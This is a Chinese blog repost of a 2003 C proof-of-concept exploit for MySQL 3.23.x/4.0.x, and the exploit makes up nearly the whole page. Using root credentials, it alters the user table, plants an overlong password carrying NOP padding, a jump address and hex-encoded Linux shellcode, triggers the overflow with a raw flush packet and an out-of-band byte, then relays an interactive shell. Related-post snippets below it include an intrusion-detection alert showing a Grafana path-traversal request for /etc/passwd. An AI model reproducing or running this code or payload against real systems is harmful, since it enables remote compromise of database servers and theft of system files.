mysql exploit_MySQL 3.23.x/4.0.x Remote Exploit

于 2021-02-17 15:45:35 发布
阅读量112 收藏
点赞数
文章标签: mysql exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35132871/article/details/114327790
版权

/* Mysql 3.23.x/4.0.x remote exploit

* proof of concept

* using jmp *eax

* bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12

* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient

* DO NOT DISTRUBITED IT

*/

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <errno.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <sys/select.h>

#include <netdb.h>

#include <mysql/mysql.h>

#define PAD 19*4*2

#define JMPADDR 0x42125b2b

#define ROOTUSER "root"

#define PORT 3306

#define MYDB "mysql"

#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"

#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"

#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"

#define BUF 1024

MYSQL *conn;

char NOP[]="90";

/*

char shellcode[]=

"31c031db31c9b002"

"cd8085c0751b4b31"

"d2b007cd8031c0b0"

"40cd8089c331c9b1"

"09b025cd80b001cd"

"80b017cd8031c050"

"405089e331c9b0a2"

"cd80b1e089c883e8"

"0af7d04089c731c0"

"404c89e250505257"

"518d4c240431dbb3"

"0ab066cd805983f8"

"017505803a497409"

"e2d231c04089c3cd"

"8089fbb103b03f49"

"cd8041e2f851686e"

"2f7368682f2f6269"

"89e351682d696c70"

"89e251525389e131"

"d231c0b00bcd8090";

*/

char shellcode[]=

"db31c03102b0c931"

"c08580cd314b1b74"

"cd07b0d2b0c03180"

"8980cd40b1c931c3"

"cd25b009cd01b080"

"cd17b08050c03180"

"e3895040a2b0c931"

"e0b180cde883c889"

"40d0f70ac031c789"

"e2894c4057525050"

"244c8d51b3db3104"

"cd66b00af8835980"

"800575010974493a"

"c031d2e2cdc38940"

"b1fb8980493fb003"

"e24180cd6e6851f8"

"6868732f69622f2f"

"6851e389706c692d"

"5251e28931e18953"

"b0c031d29080cd0b";

int type=1;

struct

{

char *os;

u_long ret;

} targets[] =

{

{ "glibc-2.2.93-5", 0x42125b2b },

},v;

void usage(char *);

void sqlerror(char *);

MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);

main(int argc,char **argv)

{

MYSQL_RES *result;

MYSQL_ROW row;

char jmpaddress[8];

char buffer[BUF],muser[20],buf2[800];

my_ulonglong rslines;

struct sockaddr_in clisocket;

int i=0,j,clifd,count,a;

char data1,c;

fd_set fds;

char *server=NULL,*rootpass=NULL;

if(argc<3) usage(argv[0]);

while((c = getopt(argc, argv, "d:t:p:"))!= EOF)

{

switch (c)

{

case 'd':

server=optarg;

break;

case 't':

type = atoi(optarg);

if((type > sizeof(targets)/sizeof(v)) || (type < 1))

usage(argv[0]);

break;

case 'p':

rootpass=optarg;

break;

default:

usage(argv[0]);

return 1;

}

}

if(server==NULL || rootpass==NULL)

usage(argv[0]);

memset(muser,0,20);

memset(buf2,0,800);

printf("@-------------------------------------------------@\n");

printf("# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #\n");

printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");

printf("---------------------------------------------------\n");

printf("[+] Connecting to mysql server %s:%d....",server,PORT);

fflush(stdout);

conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);

if(conn==NULL) exit(0);

printf("ok\n");

printf("[+] ALTER user column...");

fflush(stdout);

if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)

sqlerror("ALTER user table failed");

//select

printf("ok\n");

printf("[+] Select a valid user...");

fflush(stdout);

if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0)

sqlerror("select user from table failed");

printf("ok\n");

result=mysql_store_result(conn);

if(result==NULL)

sqlerror("store result error");

rslines=mysql_num_rows(result);

if(rslines==0)

sqlerror("store result error");

row=mysql_fetch_row(result);

snprintf(muser,19,"%s",row[0]);

printf("[+] Found a user:%s\n",muser);

memset(buffer,0,BUF);

i=sprintf(buffer,"update user set password='");

sprintf(jmpaddress,"%x",JMPADDR);

jmpaddress[8]=0;

for(j=0;j<PAD-4;j+=2)

{

memcpy(buf2+j,NOP,2);

}

memcpy(buf2+j,"06eb",4);

memcpy(buf2+PAD,jmpaddress,8);

memcpy(buf2+PAD+8,shellcode,strlen(shellcode));

j=strlen(buf2);

if(j%8)

{

j=j/8+1;

count=j*8-strlen(buf2);

memset(buf2+strlen(buf2),'A',count);

}

printf("[+] Password length:%d\n",strlen(buf2));

memcpy(buffer+i,buf2,strlen(buf2));

i+=strlen(buf2);

i+=sprintf(buffer+i,"' where user='%s'",muser);

mysql_free_result(result);

printf("[+] Modified password...");

fflush(stdout);

//get result

//write(2,buffer,i);

if(mysql_real_query(conn,buffer,i)!=0)

sqlerror("Modified password error");

//here I'll find client socket fd

printf("ok\n");

printf("[+] Finding client socket......");

j=sizeof(clisocket);

for(clifd=3;clifd<256;clifd++)

{

if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;

if(clisocket.sin_port==htons(PORT)) break;

}

if(clifd==256)

{

printf("FAILED\n[-] Cannot find client socket\n");

mysql_close(conn);

exit(0);

}

data1='I';

printf("ok\n");

printf("[+] socketfd:%d\n",clifd);

//let server overflow

printf("[+] Overflow server....");

fflush(stdout);

send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);

//if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0)

// sqlerror("Flush error");

printf("ok\n");

printf("[+] sending OOB.......");

fflush(stdout);

if(send(clifd,&data1,1,MSG_OOB)<1)

{

perror("error");

mysql_close(conn);

exit(0);

}

printf("ok\r\n");

printf("[+] Waiting a shell.....");

fflush(stdout);

j=0;

memset(buffer,0,BUF);

while(1)

{

FD_ZERO(&fds);

FD_SET(0, &fds);

FD_SET(clifd, &fds);

if (select(clifd+1, &fds, NULL, NULL, NULL) < 0)

{

if (errno == EINTR) continue;

break;

}

if (FD_ISSET(0, &fds))

{

count = read(0, buffer, BUF);

if (count <= 0) break;

if (write(clifd, buffer, count) <= 0) break;

memset(buffer,0,BUF);

}

if (FD_ISSET(clifd, &fds))

{

count = read(clifd, buffer, BUF);

if (count <= 0) break;

if(j==0) printf("Ok\n");

j=1;

if (write(1, buffer, count) <= 0) break;

memset(buffer,0,BUF);

}

}

}

void usage(char *s)

{

int a;

printf("@-------------------------------------------------@\n");

printf("# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #\n");

printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");

printf("---------------------------------------------------\n");

printf("Usage:%s -d <host> -p <root_pass> -t <type>\n",s);

printf(" -d target host ip/name\n");

printf(" -p 'root' user paasword\n");

printf(" -t type [default:%d]\n",type);

printf(" ------------------------------\n");

for(a = 0; a < sizeof(targets)/sizeof(v); a++)

printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);

printf("\n");

exit(0);

}

MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)

{

MYSQL *connect;

connect=mysql_init(NULL);

if(connect==NULL)

{

printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));

return NULL;

}

if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)

{

printf("FAILED\n[-] Error: %s\n",mysql_error(connect));

return NULL;

}

return connect;

}

void sqlerror(char *s)

{

fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));

mysql_close(conn);

exit(0);

}

// milw0rm.com [2003-09-14]

小作精的妈咪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
https://www.exploit-db.com/下载POC比较完善的代码
12-21
CVE(Common Vulnerabilities and Exposures)是用于识别安全漏洞的唯一标识,通常与安全补丁或exploit(利用)相关联。下面将详细讨论这些知识点: 1. **自动化下载**: - 通过CVE编号自动化下载代码是一种常见的...
电脑开机基本提示语全解
打造核心知识库
12-15 1258
电脑开机基本提示语全解析 错误信息:COMS battery failed 信息解析:CMOS 电池失效 解决方法:一般出现这种情况说明主板CMOS供电的电池已经快没电了,需要及时更换主板电池。(按F1可直接进系统) 错误信息:CMOS check sum error-Defaults loaded 信息解析:CMOS执行全部检查时发现错误,要载入系统预设值 解决方法:出现这种情况
关于带外数据OOB与紧急模式URG的几篇文章
snail_tt的专栏
05-03 268
 带外数据OOB与紧急模式URG  http://hi.baidu.com/wkkhkk/blog/item/51258e34d0f94c3c5bb5f51e.html OOB实现研究 http://caycraft.blogchina.com/2163484.html 
Mysql 3.23.x/4.0.x remote exploit(转)
cuankuangzhong6373的博客
05-28 167
Mysql 3.23.x/4.0.x remote exploit: /** exp for mysql* proof of concept* using jmp *eax on linux* using jmp *edx on...
metasploit-学习8--显示exploit的模块的所有exploit信息
热门推荐
简单就是美
06-19 2万+
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    -----------    aix/rpc_cmsd_opcod
sogou.zip_3318ee com_DF11 0457_bb9949..com_hotexp_http://sogou.c
09-20
5. **潜在的安全风险**:“hotexp”有时候在网络安全中用来指代潜在的恶意活动或exploit(漏洞利用),但这也需要更多信息来确认。 为了提供更具体和详细的知识点,我需要更多的信息,比如压缩包内的文件类型、用途...
multihack_[unknowncheats.me]__libcapcom_Exploit_unknowncheats.ue
09-29
标题 "multihack_[unknowncheats.me]__libcapcom_Exploit_unknowncheats.ue" 暗示我们正在处理一个与游戏作弊相关的黑客工具,可能是针对Capcom游戏公司的软件漏洞利用。这个工具可能被设计来利用libcapcom库中的...
MySQL_Exploit.rar_0day_C 0day_Exploit_mysql c
09-22
"MySQL_Exploit.rar_0day_C 0day_Exploit_mysql c"这个标题暗示了存在一个针对MySQL的0day攻击方法,可能是通过C语言编写的代码实现。 描述中提到"MySQL_Exploit 0day 放好久了 今天传上来",意味着这个漏洞可能...
ant-design-vue-1.1.10-beta.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
基于flask实现的社交博客项目--《FlaskWeb开发》.zip
最新发布
08-26
基于flask实现的社交博客项目--《FlaskWeb开发》.zip
校园二手交易平台小程序源码 (优秀毕业设计源码)
08-26
1. 校园二手交易平台小程序代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
ant-design-vue-3.1.0.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
399、基于单片机protues仿真的多功能计步器设计(仿真图、源代码、讲解视频)
08-26
399、基于单片机protues仿真的多功能计步器设计(仿真图、源代码、讲解视频) 计步器功能的实验测试: 采用USB电源线连接移动电源给系统进行供电。首先打开电源开关,系统初始化后,将开始进行计步。在液晶显示屏上输入用户的身高体重,然后佩戴计步器步行,开始测试行走步数、速度以及消耗卡路里。计步器实物图及介绍如下, 按键从左到右依次是: ⑴设置键:按下按键进入设置身高体重页面; ⑵加值键:设置时,按下该按键对应参数+1 ; ⑶ 减值键:设置时,按下该按键对应参数-1 ; ⑷ 复位键:按下该按键单片机复位。 实际测试效果如下: (1)实物联电后打开开关的初始状态如图5-3所示。“V”代表当前瞬时速度,“B”代表当前行走步数,代表当前行走里程,代表当前行走所消耗的卡路里。 (2)按下按键1设置键设置身高170cm ,再按下按键1设置体重48kg ,设置好后再按一下退出。 ⑶ 检测运动后的实验图如图5-6所示,传感器采集到的运动加速度,显示步数为,总里程为,瞬时速度为,消耗的卡路里为。瞬时速度在停下运动后,逐渐降为0。其他示数不变。 ⑷ 按下右侧复位键后的实验图如图5-7所示,行走步
ant-design-vue-0.5.4.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ssm530便民自行车管理系统的开发与实现+vue.zip
08-26
本系统为便民自行车管理系统,是采用计算机和网络技术进行开发的在线租用平台,可以实现自行车的查询、租用、归还管理等。本系统采用Java语言,数据库为Mysql,运行环境为Idea。使用角色分为用户、管理员,本系统的功能包括车辆管理、订单管理、车辆损耗管理、车辆类型管理和用户管理等。其中,用户负责浏览信息、租用自行车、管理租用订单,管理员可以审核用户信息、管理自行车信息、车辆损耗信息等。本系统实现了自行车的在线出租与管理,方便了用户和管理员双方的利益,提高自行车租用的效率,更符合现代人生活。
springboot354足球俱乐部管理系统--pf.zip
08-26
足球俱乐部管理系统管理系统按照操作主体分为管理员和用户。管理员的功能包括字典管理、公告信息管理、合同管理、教练管理、赛事管理、球员数据管理、训练计划管理、用户管理、管理员管理。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。 足球俱乐部管理系统管理系统可以提高足球俱乐部管理系统信息管理问题的解决效率,优化足球俱乐部管理系统信息处理流程,保证足球俱乐部管理系统信息数据的安全,它是一个非常可靠,非常安全的应用程序。
ant-design-vue-4.0.1.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ALERT: ET EXPLOIT Grafana 8.x Path Traversal (CVE-2021-43798) 82 Timestamp 2023-06-07T14:21:22.266209+0000 Sensor suricata Protocol TCP Source 172.16.1.23:34770 Destination 10.0.1.4:445 In Interface eno2 Flow ID 997920879570354 Signature ET EXPLOIT Grafana 8.x Path Traversal (CVE-2021-43798) Category Attempted Administrator Privilege Gain Signature ID 1: 2034629 :2 Severity 1 History 2023-06-07 22:26:19 - Archived by anonymous HTTP Hostname: 10.0.1.4 Http Method: GET Http Port: 445 Http User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Length: 0 Protocol: HTTP/1.1 Url: /public/plugins/welcome/../../../../../../../../../etc/passwd User Agent.Device: Mac User Agent.Major: 12 User Agent.Minor: 0 User Agent.Name: Safari User Agent.Os: Mac OS X User Agent.Os Full: Mac OS X 10.14.3 User Agent.Os Major: 10 User Agent.Os Minor: 14 User Agent.Os Name: Mac OS X User Agent.Os Patch: 3 User Agent.Os Version: 10.14.3 User Agent.Patch: 3 User Agent.Version: 12.0.3 Payload GET /public/plugins/welcome/../../../../../../../../../etc/passwd HTTP/1.1..Host: 10.0.1.4:445..User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15..Accept-Encoding: gzip....
06-08
It looks like you have provided a log of a security event that alerts of a potential exploit of CVE-2021-43798, which is a path traversal vulnerability found in Grafana 8.x. The log shows that there was an attempted administrator privilege gain on the destination IP address 10.0.1.4 from the source IP address 172.16.1.23. The HTTP request was a GET method to the URL "/public/plugins/welcome/../../../../../../../../../etc/passwd" which is an attempt to access the system's password file. The user agent in the request shows that it was made using Safari on a Mac OS X machine. It is important to investigate and mitigate this security event to prevent any potential damage to the system.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值